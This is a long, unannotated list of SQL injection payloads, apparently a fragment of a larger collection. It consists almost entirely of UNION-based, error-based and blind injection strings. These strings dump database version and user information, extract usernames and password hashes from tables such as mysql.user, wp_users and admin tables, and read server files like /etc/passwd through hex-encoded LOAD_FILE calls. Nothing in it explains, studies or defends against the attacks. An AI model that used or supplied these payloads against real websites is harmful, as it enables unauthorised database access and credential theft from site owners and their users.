1,2,3,4,5,6,7,8,version(),10,11,12,13,14,15,16,17/* -9277 union select 1,2,concat_ws(0x3a3a3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 -- -927 union select 1,2,concat_ws(0x3a,userid,loginname,password,access),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 from users -- -928' union select concat_ws(0x3a,version(),database(),user(),@@version_compile_os),2,3,4,5,6,7,8/* -9296 union select 1,2,3,4,5,6,7,8/* 929 union select 1,2,3,4,5,concat_ws(0x3a,user(),database(),version()),7,8,9,10,11,12,13-- -92 and 1=0 union select 1,2,3,4,5,6,7,8,concat(username,0x3a,userpassword),10,11,12,13 from users-- 92' and 1=0 UnIon selECt 1,concat_ws(0x3a,ID,USER,LOGIN,PSW),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from user_access -- -92 union select 1,2,3,4,5,6,7,8,9,0,11,2,13,14,concat_ws(0x3a,version(),database(),user()),16,17,18,19,20,21,22,23-- 92' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/* -92 union select 1,2,3,4,5,6,7,8,9,unhex(hex(concat_ws(0x3a,version(),database(),user()))),11 -92 union select 1,2,3,4,5,6,7,concat_ws(0x3a3a,cod_usuario,nome_usuario,e_mail_usuario,senha),9,10,11,12,13,14,15,16,17 from tab_usuarios limit 0,1 -- 92 UNION SELECT 1,2,3,4,5,CONCAT(0x3a,LOAD_FILE(0x2F6574632F706173737764),0x3a),7,8,9,10,11,12,13-- 92 union select 1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8,9,10,11,12,13-- 92 union select 1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14 limit 1,1/* -92 union select 1,2,3,4,convert(concat(version(),0x3a,user(),0x3a,database()),binary),6,7/* -92 union select 1,2,3,4,user(),6,7,password,9,10,11,12,13,14 from mysql.user/* -92 union select 1,2,3,concat(version(),0x3a,database(),0x3a,user()),5-- -92 union select 1,2,3,concat_ws(0x2a3a2a,name,pwd),concat_ws(0x2a3a2a,version(),user(),database()),6,7,8,9 from chat_users limit 1,10-- -92 union select 1,2,3,concat_ws(0x3b,version(),user(),database()),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,00,1 -92 union select 1,2,concat_ws(0x3a,id,name,password),concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from users/* -92 union select 1,concat(table_schema,0x3a,table_name),3,4,5 from INFORMATION_SCHEMA.columns where column_name=0x70617373776F7264 limit 0,1/* -92 union select 1,concat(user(),char(58),version(),char(58),database(),char(58),@@version_compile_os),3,4 -92 union select 1,concat(user_login,char(58),user_pass,char(58),user_mail) FROM user limit 10353,1/* 92 union select 1,concat(version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- -92 union select 1,table_name,version(),4,database() from iNFORMATION_SCHEMA.TABLES limit 0,2/* 92 union select concat_ws(0x3a,user(),version(),database()),2 -- -92 union select unhex(hex(version())),2,3,4,5,6/* -93026211 union select 1,concat(Name,0x20,Password,0x20,Email),3,4,5,6,7,8 from Login-- -9302 union select 1,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from information_schema.tables WHERE TABLE_NAME NOT IN (CHAR(67,72,65,82,65,67,84,69,82,95,83,69,84,83))/* -9307 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36-- 930 and substring(@@version,1,1) LIKE 5 -930 union select 1,2,3,4,5,6,7,concat_ws(0x3a,database(),version(),user()),9,10,11,12-- 930 union select 1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/* 9321 and 1=0 UnIon selECt 1,2,3,4,5,6,7,8,version(),10,11,12,13,14,15,16,17,18 -- 932-999.9 union select 1,2,3,4,5,6,7,8,9,10,11,12,13-- 93478 and 1=0 union select concat_ws(0x3a,user,password,host),2,3,4,5,6,7,8,9 from mysql.user/* -934 UNION SELECT 1,2,3,concat(name,0x3a,password),5,6,7 from users limit 1,1-- -934 union select 1,2,3,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),5,6,7 937135 UNION SELECT concat_ws(0x3a,version(),database(),user(),@@version_compile_os),2 LIMIT 1,1-- -9373 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a3a,version(),@@version_compile_os,user(),database()),10,11,12,13,14,15,16,17,18 -- -938021 union select 1,table_name,3,4,5,6 from information_schema.tables -- -938 union select 1,2,3,4,5,6,7,8,version(),10,11,12/* -938 union select 1,concat_ws(0x3a,version(),database(),user()) -- 9394-999.9 union select 1,concat_ws(version(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15-- 9397 union select 1,2,table_name,null,null,null,null,null from information_schema.tables -- -939 union select convert(concat_ws(0x3a,user,password) using latin1),2,3,4,5,6,7 from mysql.user-- -93 and 1=2 union select concat(@@version,0x20,user(),0x20,database(),0x20,@@version_compile_os) -- -93 UNION SELECT 1,2,3,4,5,6,7,8/* -93 union select 1,2,3,4,5,6,7,8,9,10,11,12,TABLE_NAME,14,15 from information_schema.tables-- 93 union select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,user(),database(),version())-- 93 union select 1,2,3,4,5,6,7,8 from users -93 union select 1,2,3,concat(version(),0x3A3A,user(),0x3A3A,database()),5,6,7,8,9,10,11 -- -93 union select 1,2,3,concat(version(),char(58),user(),char(58),database())/* -93' union select 1,2,3,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),5,6,7,8,9,10,11,12,13,14,15-- 93 union select 1,2,3,concat_ws(0x3a,user(),database(),version(),@@version_compile_os),5,6,7,8 -- -93 union select 1,2,concat_ws(0x3a,nombre,passwd),4,5,6,7,8,9,10,11 from manilva.usuarios -- -93 union select 1,2 from users/* -93 union select 1,concat_ws(0x3a,version(),user(),database(),@@version_compile_os),3,4,5,6,7,8,9 -- 93 union select 1,version(),concat(user(),0x3a,0x3a,database()),4,5,6,7,8,9,10,11/* -93 UNION SELECT AES_DECRYPT(AES_ENCRYPT(CONCAT(Version(),0x3a,Database(),0x3a,User()),0x71),0x71),2,3,4,5,6,7,8,9,10-- 9405' and 1=0 UnIon selECt 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,group_concat(table_name),26,27,28,29,30,31,32 from information_schema.tables where table_Schema=0x74686561727472755f6f7264656e -- -9409 union select 1,version(),3 /* -940 or(1,1)=(select count(0),concat((select concat(user(),version(),database(),@@version_compile_os) from information_schema.tables limit 0,1),floor(rand(0)*2))from(information_schema.tables)group by 2)-- -94154 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15 -9418 uNIon select 1,2,3,4,5,concat_ws(0x3a3a,name,password,is_private,email,peer,is_admin),7,8,9,10,11,12,13,14,15,16 from users -- -942 union select 1,user(),3,4,5,6,7,8,9,10,11,12-- -945 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5-- -94600 union select 1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- -94600 union select 1,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from information_schema.tables-- -94642 UNION SELECT 0,concat_ws(0x0b,user(),version(),database()),2,3,4,5,6,7,8,9,10,11,12 946 and substring(version(),1,1)=5 -9471 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 from mysql.user 94729224 union select 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- -947 union select 1,concat(login,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from users/* -9487 union select 1,2,3,concat_ws(0x3a3a3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18 limit 0,1 -- 94899 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x3a,database(),user(),version()),15,16,17,18,19,20,21,22/* 948 and 1=2 union select 1,2,group_concat(password),4,5,group_concat(login),7,8 from neoboy_admin-- -948 union select 1,2,3,password,email,6,7,8,9,status,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from users/* -9490 union select 1,2,concat_ws(char(58),version(),user(),database()),4,table_name,6,7,8,9,10,11,12,13,14,15,16 from information_schema.tables -- ## 94.9unionallselect1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8 -- 949 union select login from admins/* -94 union all select 1,2,3,4,5,6,@@version,8,9,10,11,12-- -94 UNION SELECT 0,concat_Ws(0x0b,user(),version(),database()),2,3,4,5 94' UniOn sELect 1,2,3,4,5,concat_ws(0x3a3a,name,pass),7,8,9,10,11,12,13,14 from auth -- -94 union select 1,2,3,4,5,concat_ws(0x3a,username,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20 from c_admin_user-- 94 union select 1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8,9,10,11,12,13,14,15,16/* -94 union select 1,2,3,concat_ws(0x3a,version(),user()),5-- -94 union select 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- -94 union select 1,concat_ws(0x20,user(),@@version,database()),3,4,5,6,7,8,9,10,11,12,13-- 94 union select concat_ws(0x3a,user,password),concat_ws(0x2a,version(),user(),database()),3 from mysql.user-- 9500 union select 1,2,3,username,5,user_password,7 from phpbb_users/* 950 and 1=0 union select 1,2,3,4,5,6-- 950 and 1=0 union select 1,2,3,table_name,5,6 from information_schema.tables-- 950 or (select count(*) from (select 1 union select 2 union select 3)x group by concat(mid(concat_ws(0x0b,version(),user(),database(),@@version_compile_os,0x0b),1,70), floor(rand(0)*2)))-- 951 and version()<4 952 and 1=0 union select 1,@@version,3,4,5,6,7,8,9,10,11-- 952 union select 1,concat_ws(0x3a,login,pass),3,4,5 from opt_user-- 957 AND 1=2 UNION SELECT 1,2,3,4,CONCAT_WS(CHAR(45),USER(),VERSION(),DATABASE()),6,7,8,9,10 -- -9583 UNION SELECT user(),2,version(),4,database(),concat(user,0x3a,password),7,8 from mysql.user/* 9596 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,concat(email,0x3a,password),15,16,17,18,19,20,21,22,23 from users Limit 50 95 and 1=0 union select 1,2,3,concat_ws(0x3a,h_name,h_passw),5,6,7,8 from hirlevel -95 and 1=2 union select 1,2,3,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),5 -- -95 union select 1,2,3,4,5,6,concat_ws(0x3a,version(),user(),database()),8,9,10,11,12,13 -95 union select 1,2,3,4,5,concat(username,0x3a,user_password),7,8,9 from gt_phpbb_users limit 1,1-- -95 union select 1,2,3,4,unhex(hex(concat_ws(0x3a,version(),database(),user()))),6,7,8,9,10,11 -95 union select 1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11-- -95' uNIon sELect 1,2,3,unhex(hex(user())),5,6,7,8,9,10,11,12,13,14,15 -- -95' union select 1,2,concat_ws(0x3a,table_name,column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from information_schema.columns-- -95' union select 1,2,concat_ws(0x3a,user(),version(),database()) -- -95 union select 1,concat(version(),0x20,database(),0x20,user()),3,4,5,6,7,8,9,10,11,12,13,14-- -9600 union select concat_ws(0x202d20,version(),user(),database(),@@version_compile_os),2,3,4,5 -9640 union select 1,2,concat_ws(0x3a,database(),version(),user()),4,5,6,7,8,9,10,11,12,13-- 964 and row(0,0)in(select count(@@wait_timeout),concat((select/**/concat(0x5b,user,0x5d,0x2d,0x5b,password,0x5d)/*{file_priv:Y}*/from mysql.user limit 1),char(58),floor(rand(0)*2))as z from information_schema.tables group by z) 964 UNION SELECT 1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65 LIMIT 1,1-- -965 union select 1,2,database(),4,5,6,7-- 967' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x3a3a,user_name,password,editor_house_id,permission_level),15,16,17,18,19,20,21,22,23 from admin_user_login -- 9687687609872 union select 1,2,3,4,5,6,7,concat_ws(0x3a,version(),user(),database()),9,10,11,12,13,14,15-- 968 and 1=2 union all select 1,2,3,concat(username,char(58),password),5,6,7,8,9,10,11,12 from user-- 9691379876 union select 1,2,3,4,5,6,7,8,9,concat_ws(0x3a,version(),user(),database()),11,12,13,14,15,16,17,18,19,20,21,22,23,24-- 96 and 1=0 union select 1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31-- 96 and (select 1 from (select count(0),concat((select table_name from information_schema.tables limit 21,1),floor(rand(0)*2)) from information_schema.tables group by 2)a)-- -96 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6 -- -96' union select 1,2,3,4,5,6,7,8,9,10 /* -96 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,CONCAT_WS(0x3a,version(),user(),database()),20,21/* -96 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),17,18,19,20,21,22,23,24,25 -96 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,user(),version()),0,1,2-- -96 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),user(),database()),10-- 96 union select 1,2,3,4,5,6,concat_ws(0x3a,username,version()),8,9,10,11,12,13,14,15,16,17,18,19,20 from users-- -96 union select 1,2,3,4,5,concat_ws(0x3a,id,login,password,email),7,8,9,10 from users limit 1,1/* -96 union select 1,2,3,4,concat_ws(0x3a3a3a,user,password,file_priv),6,7,8,9,10,11,12 from mysql.user -- 96 union select 1,2,3,concat_ws(0x3a,1111,user(),database(),version()),5,6-- -96 uNIon sELEct 1,2,3,user(),5,6,7,8,9,10,11 members -- -96 union select 1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(char(58,58),user(),database(),version()),0x73),0x73),4,5/* -96 union select 1,2,version(),4,5,6,concat_ws(0x2F,brand_id,name),8 from brands/* -96 union select 1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10/* -96 union select 1,concat_ws(0x3a,name,psw),3,4,5,6,7 from meteo_users-- -96' union select 1,version(),3,4/* -97075 union select 1,2,3,4,5,6,7,8,9,10,11,12 -- 9709 and 1=0 union select 1,version()-- 972 and 1=-1 union select 1,2,3,4,convert(version() using cp1251),6,7,8/* 973 union select 1,concat_ws(0x2f,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* -97473 UNION SELECT 0,concat_Ws(0x0b,user(),version(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -- -97473 union select 1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- 977 and substring(version(),1,1)=5 -977 union select 1,2,concat_ws(0x3a,version(),user()),4,5,6,7,8,9-- -9781903458327 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 /* 9781 and 1=0 union select 1,2,3,4,5,6,7,8,9,10,11,12-- -978) union select 1,2,concat_ws(0x3b,user(),version(),database(),@@version_comment,SESSION_USER(),CURRENT_USER(),SYSTEM_USER(),@@version_compile_machine,@@version_compile_os,@@basedir,@@datadir,@@tmpdir),4,5,6,7,8,9-- 979 or 1 group by concat((concat_ws(0x3a3a,version(),user(),database())),rand(0)|0) having min(0)-- 97 and 1=0 UnIon selECt 1,2,file_priv,4,5,6,7,8,9 from mysql.user where user='alexey1' -- 97 AND 1=2 UNION SELECT 0,null,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- -97 and 1=2 union select 1,2,3,4,5,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),7,8,9,10,11,12,13,14,15,16,17 -- 97 and 2=1 union select version() 97' or (1,1)=(select count(0),concat((select concat(user_login,char(58),user_pass) from wp_users limit 0,1),floor(rand(0)*2))from(information_schema.tables) group by 2)-- 97 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 FROM `MSysObjects` -97 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(0x3a,user(),database(),version()),16,17-- -97 union select 1,2,3,4,5,6,concat_ws(0x3a3a,username,password),8,9,10,11,12,13,14 from w_users-- -97 union select 1,2,3,4,5,concat(version(),0x3a,user(),0x3a,database()),7/* -97 UNION SELECT 1,2,3,4,concat_ws(0x3a,version(),database(),useR(),@@version_compile_os),6,7,8,9,10,11,12,13,14,15-- -97 union select 1,2,3,concat(username,0x3a,password),5,6 from users-- 97 union select 1,2,3,concat_ws(0x3a,user(),version(),database(),@@version_compile_os)-- 97 union select 1,2,3,group_concat(user,0x3a,pass) from admin-- 97 union select 1,2,concat(user(),char(58),version())/* -97 UnIon selECt 1,2,database(),user(),version(),6,7,8,9,10,11,12,13,14,15-- -97 union select 1,AES_DECRYPT(AES_ENCRYPT(password,0x71),0x71),3,4,5,6,7,8,9,10,11,12,13 from mysql.user/* -97 union select 1,concat(user,char(58),password),3,4,5,6,7,8,9,10,11,12 from mysql.user/* -97 union select 1,database(),3,version(),password,user,7,user(),9,10,11,12 from mysql.user/* -97 UNION SELECT 1,user,password,4,5,6,7,8,9,10,11,12 from mysql.user/* -97 union select null version()-- -97 union select user(),2,3/* 980986543 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(0x3a,version(),user(),database()),16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37-- 98098765046 union select concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8,9,10,11,12-- 980990 union select 1,2,3,4,5,version(),7,8,9,10,11/* -980 union select 1,2,3,4,5,6,7,8,9,0,1,2,table_name,4,5 from information_schema.tables limit 19,1 -- -981 union select convert(table_name using latin1),2,3,4 from INFORMATION_SCHEMA.TABLES/* 9822 union select 1,2,concat(version(),0x3a,database(),0x3a,user()),4,5,6,7,8,9,10,11,12,13 limit 1,1/* -982 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,version(),31,32,33,34,35,36,37,38,39,40/* 9831 union select 1,2,3,4,5,6,concat_ws(0x3a3a,version(),user(),database()),8,9,10,11,12,13,14,15,16-- -9838 union select 1,concat_ws(char(58),adminuser,adminpass),3,4,5,6,7,8,9,10 from banneradmin -- 9842 and substring(version(),1,1)=5 -98612 union select 1,load_file(0x2f7661722f7777772f626f6f6b73746f72652f61646d696e2f696e6465782e706870),3/* -9863 union select user(),2,3,4,5,password,7,8 from mysql.user/* -9874 UNION SELECT 1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17-- 98768 and 1=0 union select 1,concat(username,char(58),pass),3,4,5,6,7,8,9 from users1 -988 union select 1,2,3,4,5,concat_ws(0x3a,user_name,user_password),7,8 from user limit 0,1 -- -989 union select 1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),group_concat(0x0b,AuthorID,0x3a3a,Firstname,0x3a3a,Lastname),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from mtr_author-- -98 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 user* -98 UNION SELECT 1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12,13,14 from admin/* -98 union select 1,2,3,4,5,concat_ws(0x3a,id,user,pwd),concat_ws(0x3a,user(),version(),database()),8,9,10,11,12,13,14 from users/* -98 union select 1,2,3,4,version(),6,7,8,9,10,11,12,13 -- -98 union select 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 from users-- -98 UNION SELECT 1,2,concat_ws(0x3a,version(),database(),useR()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- -98 union select 1,concat_ws(0x3a,id,username,password),3,4,5,6,7,8,9 from moto_users -- 98 union select concat_ws(0x2a,version(),user(),database()),2,3,4,5,6,7,8,9/* 98 union select concat_ws(0x3a,version(),database(),user(),@@version_compile_os),2,3,4,5-- -9905 union select 1,2,user(),version(),5,6,database(),8,9,10,11,12,13,14,15,16,17,18/* -990 union select VERSION(),2,3,DATABASE(),5,6,USER(),8,9,11-- -9918 union select 1,2,3,LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100)),5,6,7,8 FROM INFORMATION_SCHEMA.TABLES-- -9918 union select null,null,null,concat(user,0x3a,password,0x3a,host),null,null,7,null from mysql.user 9929000 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56 -993 union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- -9949 union select 1,2,3,4,5,6,7,8,9 from "table" 994' unIon SeleCt 1,concat(table_schema,'.',table_name),3,4 from information_schema.tables limit 17,1/* -9959 union select concat_ws(0x3a,user(),version(),database()) -99664' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,version(),14,15 -- 9966) or 1=(SELECT TOP 1 cast(UserName as nvarchar) ':' cast(Password as nvarchar) ':' cast(id as nvarchar) FROM Àäìèíèñòðàòîðû)-- -9968 union select 1,2,3,4,load_file(0x2f6574632f706173737764),1,2,3,5,9/* -996 uNIon sELEct 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 -- -996 union select 1,2,3,concat(version(),char(58),user()),5/* 99782 UNION SELECT 1,2,3,4,5,concat_ws(0x3a,version(),user(),database(),@@version_compile_os),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116 limit 1,1 997867980 union select 1,2,3,4,5,6,concat_ws(0x3a,version(),user(),database()),8,9,10,11,12,13,14-- -9979 union select user,2,3,4,5,password,7,8 from mysql.user/* 998 and ascii(substring(version(),2,1))=46. 998 and substring(version(),1,1)=5 5 -998 union select 1,2,concat_ws(0x3a,version(),database(),useR(),@@version_compile_os),4,5,6,7,8,9,10,11,12/* 9991475 union select 1,2,concat_ws(0x3a3a,version(),user(),database()),4,5,6,7,8,9,10-- 9991 uNioN SeleCt Card_Id,Balance,ActivationCode,IsActivated from Cards-- -99991%27%20 union select version()/* 999919 union select 1,2,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()) 999919 union select 1,2,VERSION() 999930 union select 1,2,concat_ws(0x3a3a,version(),user(),database())-- -999951 union select 1,2,3,4,concat_ws(0x3a3a,version(),user(),database()),null,7,8/* -999951 union select 1,2,3,4,concat_ws(0x3a,username,password),null,7,8 from fc_current.adminlogin/* 99997010 union select 1,version(),3,database(),5,6,USER(),8,9,10,LAST_INSERT_ID(),12,13,14,15,16,17,18,19,20,21-- 99998009 union select 1,2,3,4,concat(user_login,char(58),user_password),6,7,8,9,10,11,12 from users limit 0,1/* 999992220 union select 1,2,3,4,5,6,7,8,9,concat_ws(0x3a3a,version(),user(),database()),11,12,13,14,15,16,17,18,19,20,21-- 999999%27 union select unhex(hex(version()))/* 99999999999999999 ; select null,version(),null,4,null,null,null,null,null,null,null,null,null,null,null,null,null,null-- 9999999999999999' UNION SELECT 1,concat(user,0x3a,password),3,4,5,6,7,8,9,10,11 from mysql.user limit 0,1/* 9999999999999999 union select unhex(hex(concat_ws(0x3a,version(),database(),user()))) 999999999999999 union select 1,2,concat_ws(char(58),user(),version(),database()),4/* 999999999999999 union select version(),2,concat_ws(0x3a3a,login,password) from user limit 10,1-- 99999999999999 union select 1,2,3,4,5,concat(database(),char(58),user(),char(58),version()),7,8,9/* 99999999999999 union select 1,2,3,password,login,6,7,8,USER(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 from users limit 3.1/* 99999999999999 union select 1,2,concat(version(),database(),user()),4,5,6,7,8,9,1,2,3/* 99999999999999' union select 1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,0,1,2,3-- 99999999999999' union select 1,concat_ws(0x3a,version(),user(),database(),@@version_compile_os) from information_schema 99999999999999 union select 1,convert(concat(database(),0x09,user(),0x09,version()) using cp1251),3,4 limit 0,1-- -99999999999999 union select version()/* 99999999999999 UNION SELECT @@version/* 9999999999999/**/UNION/**/SELECT/**/1,2,3,4,5,concat_ws(char(58),name,username,password,email),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from users2 limit 0,1/* 9999999999999' union select 1,2,3,4,version(),6,7,8,9/* 9999999999999 union select 1,table_name,3 from information_schema.tables-- 9999999999999'/**/UNION/**/SELECT/**/1,version(),3,4,5,6,7,concat_ws(0x3a,user,password),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 from mysql.user limit 0,1/* 9999999999999 UNION SELECT concat(user,0x3a,password),2,3,4 from mysql.user/* 999999999999 union select 1,2,3,4,AES_DECRYPT(AES_ENCRYPT(VERSION(),0x71),0x71),6,7,8,9,10,11,12,13,14,15,16/* -999999999999 union select 1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9/* 999999999999 union select 1,2,3,4,userpassword,6,7,8,9,10 from users limit 1,1-- 999999999999 union select 1,2,AES_DECRYPT(AES_ENCRYPT(DATABASE(),0x71),0x71),4,5,6,7,8,9,10,11,12,13,14,15,16/* 999999999999/**/UNION/**/SELECT/**/1,concat_ws(0x3a,user,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from mysql.user limit 0,1/* 999999999999 union select 1,mysql.user.password,3,4,5 from mysql.user limit 0,1/* 999999999999 union select concat_ws(0x2e,table_schema,table_name) from information_schema.tables limit 20,1/* 999999999999 union select concat_ws(0x3a3a3a,Login,Password) from logins limit 0,1-- 99999999999 union select 1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18/* 99999999999 UNION SELECT 1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- 99999999999 union select 1,2,3,username,pwd from tuserinfo/* 99999999999 union select 1,2,3,user(),version(),database()/* -99999999999 union select 1,unhex(hex(concat_ws(0x3a,user(),database(),version()))),3 99999999999' union select 1,unhex(hex(version())),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/* 99999999999 UNION SELECT all 1,pass,3,4,5,6 from users/* -99999999999 union select concat_ws(0x3a,user(),database(),version()),2,3 9999999999 union select 1,2,3,4,5,6,7,8,9,concat_ws(0x3a,version(),database(),user()),11,12,13,14,15,16-- 9999999999 union select 1,2,3,4,5,6,7,concat_ws(0x2F,name,password),9,10,11,version(),13,14,15,16 from agora.agora_users/* 9999999999 union select 1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16-- 9999999999 union select 1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 9999999999 UNION SELECT 1,2,3,concat(user,0x3a,password),5,6,7,8,9,10 from mysql.user/* 9999999999 union select 1,2,concat(database(),char(58),user(),char(58),version()),4,5,6,7,8,9/* 9999999999 union select 1,2,concat_ws(0x3a,version(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 9999999999 union select 1,2,unhex(hex(concat_ws(0x3a,id,login,passwd,email))) from us_users/* 9999999999 union select 1,concat(name,0x3a,email),3,4,5,6 from ibf_members/* 9999999999 UNION SELECT 1,concat_ws(0x3a,user,password),3,4,5 from mysql.user/* 9999999999 union select 2,3 from koncert/* -9999999999 union select concat(version(),user(),database())/* 9999999999 union select password from usuario -- 999999999 AND 1=2 UNION SELECT 1,2,3,4,5,6,7,CONCAT_WS('-',USER(),VERSION(),DATABASE()),9,10,11 -- 999999999;select user,passwd,3 from PG_shadow limit 2 offset 0-- 999999999 union select 1,2,3,4,5,6,7,TABLE_NAME,9,version(),11,12,13,14,15 FROM INFORMATION_SCHEMA.TABLES LIMIT 1,1/* 999999999) union select 